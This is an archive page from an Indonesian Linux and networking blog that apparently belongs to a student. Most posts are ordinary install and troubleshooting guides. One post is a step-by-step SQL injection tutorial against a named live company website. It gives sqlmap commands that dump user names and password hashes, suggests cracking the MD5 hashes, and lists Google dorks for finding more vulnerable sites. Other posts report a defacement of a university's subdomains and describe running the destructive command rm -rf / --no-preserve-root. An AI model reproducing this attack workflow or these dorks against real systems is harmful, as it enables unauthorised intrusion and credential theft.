2017 - HeroIT

HeroIT

Learn until whenever

  •

    • Jumat, 08 Desember 2017

    Install Lamp server Di Backbox (Ubuntu based)

    Desember 08, 2017 0
    Install Lamp server Di Backbox (Ubuntu based)





    Oke tutorial kali ini mungkin sangat mudah ya bagi para master linux, tetapi ijinkan saya untuk berbagi sedikit, apa itu LAMPP lampp itu singkatan dari Linux Apache Mysql Php Perl merupakan sebuah paket perangkat lunak bebas yang digunakan untuk menjalankan aplikasi secara lengkap, disini saya menggunakan OS Backbox, yang mana backbox ini tutrunan dari Ubuntu, sederhananya ini seperti XAMPP tetapi untuk linux, oke gak usah bertele-tele lagi langsung saja.

    INSTALL LAMP SERVER

    sudo apt-get install lamp-server^
    • Oke perintah di atas merupakan perintah untuk menginstall paket lamp-server
    • Untuk proses instalasi nya memang gak lama
    • Saat proses instalasi kalian akan di minta untuk memasukan password root mysql isikan sesuka kalian 
    • Tunggu proses instalasi selesai 
    • Jika sudah selesai ketikan service apache2 status untuk melihat apakah service apache2 sudah berjalan atau belum, kalo belum silahkan jalankan perintah service apache2 start, kemudian cek kembali statusnya, dan ujicoba lewat web browser dengan mengetikkan localhost pastikan hasilnya seperti gambar di bawah ini 

    • Selanjutnya ujicoba mysql nya, pada terminal console kalian ketikan mysql -u root -p lalu kalian masukkan password root mysql yang sudah kalian isikan saat instalasi lamp-server tadi pastikan hasilnya seperti gambar di bawah ini  


    • Selanjutnya pengujian untuk php nya, buatlah file dengan nama phpinfo.php isikan file phpinfo.php tersebut dengan syntax php berikut 
    <?php phpinfo(); ?> 
    lalu simpan di /var/www/html/phpinfo.php kemudian buka web browser ketikkan pada address bar localhost/phpinfo.php pastikan hasilnya adalah informasi tentang php seperti gambar berikut 

    INSTALL PHPMYADMIN

    • Langkah berikutnya yaitu menginstall phpmyadmin ketikkan perintah di bawah ini pada terminal console kalian
    sudo apt install phpmyadmin php-mbstring php-gettext

    • Saat instalasi kalian akan di minta untuk memberikan password user phpmyadmin
    • Lalu uji coba lewat web browser ketikkan pada address bar localhost/phpmyadmin pastikan hasilnya seperti gambar berikut

    • User nya adalah root, kemudian password nya yang sudah di set tadi 

    Ok sampai di sini dulu tutorial hari ini, biasanya setelah install phpmyadmin akan terjadi error not found nah cara mengatasi nya kalian bisa baca ini Mengatasi error not found pada phpmyadmin di Linux selamat mencoba and learn until whenever 😊😉
    By di Tidak ada komentar:
    Label:

    Mengatasi Error not found pada phpmyadmin di GNU/Linux

    Desember 08, 2017 0
    Mengatasi Error not found pada phpmyadmin di GNU/Linux



    Error not found pada Phpmyadmin biasanya terjadi saat kalian baru menginsttall Lampp, lalu bagaimana cara mengatasiya oke langsung saja

    CARA MENGATASI

    • Pertama buka terminal console kalian lalu ketikkan
    sudo ln -s /usr/share/phpmyadmin/ /var/www/html/phpmyadmin
    • Jika cara di atas masih belum berhasil kalian bisa menggunakan cara berikut, ketikkan pada terminal console kalian 
    sudo ln -s /etc/phpmyadmin/apache.conf /etc/apache2/conf-available/phpmyadmin.conf 
    sudo a2enconf phpmyadmin.conf 
    sudo service apache2 reload
    • Atau jika cara di atas masih belum bisa kalian bisa menggunakan cara berikut 
    • pertama edit file apache2.conf dengan menggunakan perintah
    nano /etc/apache2/apache2.conf 
    • kemudian pada baris paling akhir, tambahkan  
     Include /etc/phpmyadmin/apache.conf
    • Kemudian restart service apache2 menggunakan perintah
    service apache2 restart
    oke itulah tutorial cara mengatasi error not found pada phpmyadmin di linux, mugkin sampai di sini dulu tutorial kali ini, semoga bermanfaat and learn until whenever 😄
    By di Tidak ada komentar:
    Label: , ,

    Rabu, 06 Desember 2017

    SQL Injection with SQLMAP

    Desember 06, 2017 0
    SQL Injection with SQLMAP




    SQL Injection with SQLMAP~Yo bertemu lagi dengan saya, pada kesempatan kali ini saya akan memberikan tutorial bagaimana cara melakukan sql injection pada sebuah website menggunakan tool yang mungkin sudah familiar ya ?? lha terus dari mana saya mendapatkan target nya ?? saya melakukan dorking tenang nanti saya kasih dork nya oke kita mulai saja biar gak kelamaan

    1. Pertama buka web browser kalian, pada address bar isikan URL target kalian di sini target saya adalah http://www.sentulcity.co.id/product-det2.php?id=4 oke selanjutnya kita tambhakan karakter  ' pada bagian php?id=4' jadi nya gini http://www.sentulcity.co.id/product-det2.php?id=4' untuk melihat apakah ada pesan error selanjutnya tekan enter.


    nah kalo error seperti di bawah ini, berarti tandanya website ini vuln


    sebenernya untuk error nya setiap kasus beda-beda ya

    2. Oke lanjut langkah kedua buka terminal kalian terus ketikkan perintah untuk melihat database yang ada pada website tersebut dengan menggunakan perintah
       sqlmap -u (target kalian ) --dbs 
       oke dari perintah di atas kita mendapatkan dua database disana, mohon maaf saya               sensor
    3. Nah udah dapat database nya tinggal kita lihat ada berapa table pada database tersebut  menggunakan perintah 
        sqlmap -u (target kalian) -D (pilih database nya) --tables
        sqlmap -u http://www.sentulcity.co.id/product-det2.php?id=4 -D (sensor :v) -- tables


    oke dari perintah tadi kita mendapatkan 45 table di website tersebut, nah di sini kalian cari kira-kira table mana yang berisi username dan password di sana ada tbl_user kemungkinan  username dan password ada di tabel itu.

    4. Selanjutnya kita lihat column pada tabel yang sudah ditentukan menggunakan perintah 
    sqlmap -u (target kalian ) -D (sensor :v) -T tbl_user --column 
    sqlmap -u http://www.sentulcity.co.id/product-det2.php?id=4 -D (sen sor :v) -T tbl_user --column


    Benar saja di sana ada column user_name dan user_pass nah kita dump column itu untuk mendapatkan username dan password.

    5. Kita dump column user_name dan user_pass untuk mendapatkan password menggunakan perintah
     sqlmap -u (target kalian) -D (sensor :v) -T tbl_user -C user_name,user_pass --dump
     sqlmap -u http://www.sentulcity.co.id/product-det2.php?id=4 -D (sensor :v) -T tbl_user   - C user_name,user_pass --dump

    Oke setelah kita dump kita mendapatkan username dan password, kalian bisa lihat disana passwordnya di hash kemungkinan pake hash md5, kalian bisa decrypt md5 nya menggunakan md5 decrypter online hashkiller disini oke di bawah ini adalah dork yang saya janjikan tadi 
    intext:"GetArray()" +site:mm
    intext:"FetchRow()" +site:mm
    product.php?testimonial_id=
    product.php?testimonial_cat=
    product.php?testimonial_proid=
    product.php?testimonial_cid=
    product.php?testimonial_pid=
    product.php?testimonial_id=
    inurl:"merchandise/index.php?cat="
    inurl:".php?index="
    inurl:".php?CID="
    inurl:".php?SID="
    inurl:".php?term="
    inurl:".php?sellerID="
    inurl:".php?func="
    inurl:".php?idz="
    inurl:".php?opt="
    inurl:".php?txtMainNavID="
    inurl:".php?main="
    inurl:".php?mood&cat="
    inurl:".php?ResultGridPage="
    inurl:".php?machineid="
    inurl:".php?p1="
    inurl:".php?uid="

    sekalian deh live target nya
    Oke sampai sini dulu ya tutorial kali ini, sebelumnya ini hanya untuk pembelajaran ya ?? jadi
    jika nanti ada apa-apa saya gak bertanggung jawab, karena saya hanya memberikan tutorial
    saja oke sampai jumpa di tutorial berikutnya [sinkayupi48] 😀😁

    kalo bingung kalian bisa lihat video nya di bawah ini
    By di Tidak ada komentar:
    Label:

    Install Cmatrix Terminal Console Hacker

    Desember 06, 2017 0
    Install Cmatrix Terminal Console Hacker


    Install Cmatrix Terminal Console Hacker~Selamat siang semuanya, pernah liat terminal linux seperti gambar di atas ??? kalo kamu penggemar film-film hacker pasti tau, kamu bisa melakukan nya di terminal linux kamu gimana cara nya 
    oke langkah pertama install cmatrix menggunkan perintah :

    apt-get install cmatrix
    tunggu proses instalasi selesai
    oke kalo udah selesai tinggal jalankan di terminal linux mu menggunakan perintah :
    cmatrix
    lalu tekan enter
    tadaaaaaa kayak di film-film hacker kan ??? oke sekian
    nih contoh punya ku 👇 [Sinkayupi48]
    By di Tidak ada komentar:
    Label: ,

    Selasa, 05 Desember 2017

    Cara install network simulator gns3 di Backbox (Based OS Ubuntu)

    Desember 05, 2017 0
    Cara install network simulator gns3 di Backbox (Based OS Ubuntu)



    Cara install network simulator gns3 di Ubuntu~halo, kembali bertemu dengan saya, kali ini saya akan memberikan tutorial cara menginstall network simulator gns3 di ubuntu, bagi kalian anak smk jurusan tkj tentu sudah familiar dengan network simulator yang satu ini, nah kadang gini kalian pengen belajar linux dan akhirnya kalian menginstall linux di laptop atau pc kalian, sedangkan praktek network simulator mengggunakan gns3 di sekolah biasanya sebagian sekolah masih pake windows, kalian bingung dong gimana cara install gns3 di os linux kalian sedangkan di sekolah praktek nya pake windows & gimana cara menggunakan nya, sebenernya cara menggunkanannya sama saja antara dil inux sama di windows, oke biar gak kelamaan karena keliatannya kalian gak sabar hehehe langsung saja ya ?

    Langkah pertama masukan repository ppa gns3 nya, oh iya di sini saya menggunakan os backbox ubuntu 16.04 mungkin pengguna ubuntu 16.04 bisa mencobanya , oke cara memasukan repository nya dengan menggunakan perintah :
    • sudo add-apt-repository ppa:gns3/ppa
    • sudo apt-get update
    oke jika sudah memasukkan repository nya jangan lupa update, selanjutnya install menggunakan perintah :
    • sudo apt-get install gns3

    tunggu instalasi selesai, jika sudah selesai kalian bisa membuka gns3 nya lewat teminal console dengan mengetikkan gns3 lalu enter atau dengan mengklik icon gns3, oke sekian tutorial singkat dari saya semoga bermaanfaat 😊 berikut adalah tampilan gns3 di linux backbox 
    By di Tidak ada komentar:
    Label:

    Senin, 04 Desember 2017

    Cara mengatasi error Could not get lock /var/lib/dpkg/lock

    Desember 04, 2017 0
    Cara mengatasi error Could not get lock /var/lib/dpkg/lock






    Oke langsung saja biasanya error ini terjadi saat instalasi software menggunakan perintah pada terminal console, seperti pada gambar di atas saya ingin menginstall gimp dengan perintah

    apt-get install gimp

    tetapi muncul error

    E: Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable)
    E: Unable to lock the administration directory (/var/lib/dpkg/), is another process using it?

    lalu bagaimana cara mengatasi nya ?? berikut cara mengatasinya :

    • MENGHENTIKAN PROSES  MENGGUNAKAN PERINTAH PS AUX
      1.  ps aux | grep apt
    •  MENGHAPUS FILE LOCK DAN MENGULANGI KONFIGURASI
          1.  sudo rm /var/lib/dpkg/lock

               langkah selanjutnya konfigurasi ulang menggunakan perintah :

          2.  sudo dpkg --configure -a


    saya menggunakan cara yang kedua yaitu menghapus file lock dan mengkonfigurasi ulang dan work perlu kalian perhatikan perintah menghapus file lock akan menghapus file dan konfigurasi sementara saat menginstall aplikasi, artinya kamu harus mengulang konfigurasi dan jika file nya berukuran besar akan makan banyak kuota mu, kecuali kalo kuota mu tak terbatas. 😀
    oke sekian tutorial dari saya semoga bermanfaat .😊 
    By di Tidak ada komentar:
    Label: ,

    Merekam desktop dengan SimpleScreenRecorder

    Desember 04, 2017 0
    Merekam desktop dengan SimpleScreenRecorder





    Merekam desktop dengan SimpleScreenRecorder~Yosh bertemu lagi dengan saya, pada kesempatan kali ini saya akan memberikan tutorial cara install SimpleScreenRecorder
    udah keliatan dari nama nya ya ?? ya software ini adalah salah satu software perekam desktop, kenapa saya milih ini jujur penggunaanya sangat simpel, sebenernya di laptop saya udah ada software perekam bawaannya namanya RecordMyDesktop, tapi bedanya gini kalo record screen dengan RecordMyDesktop ketika video di jalankan di VLC videonya patah-patah (bukan goyang ya :v) nah kalo pake SimpleScreenRecorder lancar-lancar aja.

    berikut adalah feature nya :

    •     Graphical user interface (Qt-based).

    •     Faster than VLC and ffmpeg/avconv.    

    •    Records the entire screen or part of it, or records OpenGL    applications   directly (similar to Fraps on Windows).

    •     Synchronizes audio and video properly (a common issue with VLC and ffmpeg/avconv).

    •     Reduces the video frame rate if your computer is too slow (rather than using up all your RAM like VLC does).

    •     Fully multithreaded: small delays in any of the components will never block the other components, resulting is smoother video and better performance on computers with multiple processors.

    •     Pause and resume recording at any time (either by clicking a button or by pressing a hotkey).

    •     Shows statistics during recording (file size, bit rate, total recording time, actual frame rate, ...).

    •     Can show a preview during recording, so you don't waste time recording something only to figure out afterwards that some setting was wrong.

    •     Uses libav/ffmpeg libraries for encoding, so it supports many different codecs and file formats (adding more is trivial).

    •     Can also do live streaming (experimental).

    •     Sensible default settings: no need to change anything if you don't want to.

    •     Tooltips for almost everything: no need to read the documentation to find out what something does.


    oke  bagaimana cara menginstallnya ??? langsung saja buka terminal nya ketikan :

    sudo add-apt-repository ppa:maarten-baert/simplescreenrecordersudo apt-get updatesudo apt-get install simplerecorderscreen

    jika sudah selesai bisa kalian jalankan via terminal console dengan mengetikkan simplerecorderscreen atau kalian bisa search meggunakan application finder lalu jalankan.

    oke sekian tutorial dari saya semoga bermanfaat [Sinkayupi48]😉
    By di Tidak ada komentar:
    Label:

    Jumat, 01 Desember 2017

    Website Politeknik Muhammadiyah Pekalongan Diretas beberapa subdomain berubah tampilan

    Desember 01, 2017 2
    Website Politeknik Muhammadiyah Pekalongan Diretas beberapa subdomain berubah tampilan


    Politeknik Muhammadiyah Pekalongan yang beralamatkan di Unnamed Rd,, Kb. Agung, Kajen, Pekalongan, Jawa Tengah merupakan salah satu perguruan tinggi favorit di kota ini, 
    tetapi baru-baru ini ada berita yang cukup menggemparkan, pasalnya beberapa subdomain website tersebut diretas oleh kelompok hacker yang menamai dirinya Family Attack Cyber gambar di atas adalah contoh tampilan yang berubah dari salah satu subdomain yang diretas oleh kelompok hacker tersebut.

    Berikut adalah beberapa subdomain yang berubah tampilan nya :

    http://sms.politeknikmuhpkl.ac.id/php.htm
    http://alumni.politeknikmuhpkl.ac.id/php.htm
    http://baak.politeknikmuhpkl.ac.id/php.htm
    http://bimbingan.politeknikmuhpkl.ac.id/php.htm
    http://cloud.politeknikmuhpkl.ac.id/php.htm
    http://e-file.politeknikmuhpkl.ac.id/php.htm
    http://pegawai.politeknikmuhpkl.ac.id/php.htm
    http://perpustakaan.politeknikmuhpkl.ac.id/php.htm
    http://simaset.politeknikmuhpkl.ac.id/php.htm
    http://simaster.politeknikmuhpkl.ac.id/php.htm

    Tidak hanya itu peretas juga menyisipkan contact email nya UstadHaxor@gmail.com dan juga menyisipkan lagu dari grup band Stand Here Alone berjudul Kita lawan mereka, belum di ketahui apa motif di balik peretasan ini, sampai berita ini di publikasikan belum ada tindakan dari admin website tersebut. sekian selamat beraktifitas 😊 
    By di 2 komentar:
    Label:

    Delete everything with rm -rf / --no-preserve-root

    Desember 01, 2017 0
    Delete everything with rm -rf / --no-preserve-root



    Ya mungkin itulah judul yang pas untuk hari ini , 😓 kejadian yang tidak pernah saya lupakan 
    seharusnya saya sudah ngeh dengan perintah itu, tapi mungkin karena saya sedang terburu-buru jadi yaah gitu lah kejadian nya, biar gak penasaran saya cerita dari awal aja.

    Jadi awal mula nya, saya pengguna linux khususnya untuk distro backbox, saya akan menjelaskan sedikit backbox ini distro turunan ubuntu yang basic nya adalah untuk pentesting tapiiiiiii, karena ada suatu keperluan saya ingin menginstall LAMP saya gak akan jelasin apa itu lamp kalian bisa cari sendiri di internet banyak, jadi awalnya saya lupa password untuk mysql saya, nah tindakan pertama saya adalah mereset pass mysql saya, tapi gagal akhirnya saya bingung nah saya terpaksa harus uninstall mysql-server & client dan phpmyadmin dan saya install lagi dan insyaallah saya tidak lupa pass nya, oke singkat nya masalah lupa pass mysql sudah fix, belum cukup sampai disitu ketika saya ketikan localhost/phpmyadmin di address bar web browser malah keluarnya seperti ini


    Saya bikin extra-large biar keliatan, nah sampai disitu saya mulai bingung akhirnya saya ubek-ubek google,ask ubuntu, sampai stackoverflow huehehehe sebenernya saya sempat melihat error seperti ini di salah satu forum di facebook tapi saya lupa di forum mana, nah akhirnya saya tanya ke forum linux di telegram gak tanggung-tanggung forum luar negeri langsung wkwkwkwk (sok iya).

    Nah di sinilah awal bencana yang menimpa saya :v saya ss percakapan nya, awal nya saya bertanya seperti ini


    kemudian ada salah satu member yang menjawab 


    nah seharusnya saya sudah ngeh dengan jawabannya, tapi karena saya terlalu terburu-buru dan karena semaleman gak tidur 😓 yaa jadi begitulah, dengan kondisi yang sedang terburu-buru saya sempat menanyakan kenapa bisa terjadi seperti itu 


    Lalu saya eksekusi perintah yang di berikan di terminal linux saya, sebenernya itu baru saya oprek,dan jujur saja saya suka tampilan nya 😔 di sinilah terjadi nya human error saya baru ngeh ketika saya tekan enter yaaaa saya sudah berusaha dengan ctrl-x, ctrl-c tapi yaaa nasi sudah menjadi bubur ayam,  rm -rf / --no-preserve-root  adalah perintah untuk menhapus direktori root artinya semua file yang ada pada harddisk terhapus termasuk file system nya, dan jangan harap bisa booting, lalu saya restart laptop nah di sini klimaksnya keluarlah grub rescue, yah saya sedikit kecewa hari ini karena "keterburu-buruan" saya beruntung saya dual boot dengan windows, dan semua file-file penting ada di windows walaupun ada file penting di backbox tapi yaaa saya ikhlaskan, saya recovery menggunakan bootable cd windows dan bisa masuk 😓 h-1 sebelum uas gasal yang sangat mengecewakan.

    Pesan saya jangan terburu-buru dalam mengerjakan sesuatu, slow but sure, alon-alon asal kelakon semoga curhatan saya ini bermanfaat bagi kalian see you 😢😢😢
    By di Tidak ada komentar:

    Selasa, 21 November 2017

    Konfigurasi OSPF Routing di Gns3 & Virtual Box

    November 21, 2017 2
    Konfigurasi OSPF Routing di Gns3 & Virtual Box




    A. PENGERTIAN

    Open Shortest Path First (OSPF) adalah sebuah protokol routing otomatis (Dynamic Routing) yang mampu menjaga, mengatur dan mendistribusikan informasi routing antar network mengikuti setiap perubahan jaringan secara dinamis. Pada OSPF dikenal sebuah istilah Autonomus System (AS) yaitu sebuah gabungan dari beberapa jaringan yang sifatnya routing dan memiliki kesamaan metode serta policy pengaturan network, yang semuanya dapat dikendalikan oleh network administrator. Dan memang kebanyakan fitur ini diguakan untuk management dalam skala jaringan yang sangat besar. Oleh karena itu untuk mempermudah penambahan informasi routing dan meminimalisir kesalahan distribusi informasi routing, maka OSPF bisa menjadi sebuah solusi.

    OSPF termasuk di dalam kategori IGP (Interior Gateway Protocol) yang memiliki  kemapuan Link-State dan Alogaritma Djikstra yang jauh lebih efisien dibandingkan protokol IGP yang lain. Dalam operasinya OSPF menggunakan protokol sendiri yaitu protokol 89.

    B. LANGKAH KERJA

    1. TOPOLOGI
    2. KONFIGURASI MIKROTIK R1

    a.  Ubah hostname menggunakan perintah

    b.  Kemudian konfigurasi ip address untuk ether1 dan ether2 sesuai ketentuan


    c.  Cek konfigurasi ip menggunakan perintah ip address print pastikan konfigurasi sudah  benar


    d.  Cek informasi area dari OSPF menggunakan perintah routing ospf area print


    e.  Selanjutnya karena area backbone sudah ada, maka langkah berikutnya yaitu membuat area1, lalu lakukan pengecekan kembali seperti langkah sebelum nya




    3.   KONFIGURASI MIKROTIK R2

    a.   Ubah hostname menggunakan perintah


    b.   Kemudian konfigurasi ip address untuk ether1 dan ether2 sesuai ketentuan


    c.   Cek konfigurasi ip menggunakan perintah ip address print pastikan konfigurasi sudah  benar


    d.   Cek informasi area dari OSPF menggunakan perintah routing ospf area print


    e.   Selanjutnya karena area backbone sudah ada, maka langkah berikutnya   yaitu  membuat area1, lalu lakukan pengecekan kembali seperti langkah   sebelum nya



    4.   KONFIGURASI ROUTER MIKROTIK R3



    a.   Ubah hostname menggunakan perintah



    b.   Kemudian konfigurasi ip address untuk ether1 dan ether2 sesuai ketentuan


    c.   Cek konfigurasi ip menggunakan perintah ip address print pastikan konfigurasi sudah  benar


    d.   Cek informasi area dari OSPF menggunakan perintah routing ospf area print


    e.   Selanjutnya karena area backbone sudah ada, maka langkah berikutnya   yaitu  membuat area1, lalu lakukan pengecekan kembali seperti langkah   sebelum nya




    5. PENGALAMATAN IP UNTUK PC1 DAN PC2

    a.   Klik kanan pada PC1, lalu pilih console

    Kemudian ketikan
    Ip 192.168.1.2/24 192.168.1.1

    b.   Klik kanan pada PC2, lalu pilih console

    Kemudian ketikan
    Ip 192.168.4.2/24 192.168.4.1


    6.   Mengaktifkan routing protocol OSPF dengan menambahkan alamat network yang        terhubung secara langsung (directly connected) ke area backbone dan area 1, di setiap router

    a.       R1


    b.      R2


    c.       R3
     


    7. Melihat informasi table routing dan hubungan (neighbour) setiap router

    a.       R1



    b.      R2

    c.       R3




    8. Pengujian terakhir ping dari PC1 ke PC2 atau sebaliknya jika hasilnya reply from ttl berarti konfigurasi dynamic routing ospf berhasil



    Yak,  berhasil ya ??? 😊 oke sekian tutorial dari saya semoga bermanfaat sampai jumpa 😉 oh ya jika kalian bingung bisa lihat video di bawah ini 

    Silahkan download modulnya disini
    By di 2 komentar:
    Label: